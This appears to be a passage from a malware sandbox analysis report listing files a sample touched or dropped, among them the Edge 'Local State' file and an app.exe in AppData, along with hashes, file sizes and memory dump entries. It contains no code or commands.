6a2365bd36ecc2e0d10f8e9122ff9814c91bd686

SHA256
aa2c29f546739e76ab24ead640b71d2ccc49c35927d36d83b64c178495c4f7f9

SHA512
ca1f99dfa7bd839757e8abbab28ca41a9fbd64fc2d89f0d119b7c86d9cf8b1d6f4df1d48fa58ab0487736f24122fde9714fc6f94f46296387bef40155723f501

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
41KB

MD5
e1de7fcd3b6d8a5b6152e006f3da68d3

SHA1
a1b2f4a7cbaa12726deac7a49148813cd3e37013

SHA256
73982fb9749e12869c83756b0db4e8bb40b7cdf4eec5ab8d2c1da4ae4cbdd901

SHA512
5d1a3db49c7725588619ee39ac35fe979998deb6874fd64268e00a61070a4fa85ef0534becc1e4ac3b1c70bdf306890085fbea23c1fe12ae573eddb17b4d029e

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_uwxibobg.tx2.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\app.exe

Filesize
5.2MB

MD5
7326b7f930ea89199ded8fe22c2392aa

SHA1
80582772fee38e2c079d70c9055a2e863f74cf9e

SHA256
572ed36e9976b7b63e8d606830b08982312bb941031a1cdb4767eee21a87bf51

SHA512
dd67d21dddfbde3c052ba7a814ce6a78108d2ce7224f72f41240bd5824191e9ab9b4530a739bf37a36587bcd86da20f1ae15bc32eeed4a433fa7b6b4ad2adfc1

Download Submit
memory/5984-0-0x00007FFAD8A03000-0x00007FFAD8A05000-memory.dmp

Filesize
8KB

Download
memory/5984-26-0x00007FFAD8A00000-0x00007FFAD94C1000-memory.dmp

Filesize
10.8MB

Download
memory/5984-15-0x00007FFAD8A00000-0x00007FFAD94C1000-memory.dmp

Filesize
10.8MB

Download
memory/5984-14-0x00007FFAD8A00000-0x00007FFAD94C1000-memory.dmp

Filesize
10.8MB

Download
memory/5984-13-0x00007FFAD8A03000-0x00007FFAD8A05000-memory.dmp

Filesize
8KB

Download
memory/5984-12-0x00007FFAD8A00000-0x00007FFAD94C1000-memory.dmp

Filesize
10.8MB

Download
memory/5984-11-0x00007FFAD8A00000-0x00007FFAD94C1000-memory.dmp

Filesize
10.8MB

Download
memory/5984-1-0x0000021C7B240000-0x0000021C7B262000-memory.dmp

Filesize
136KB

Download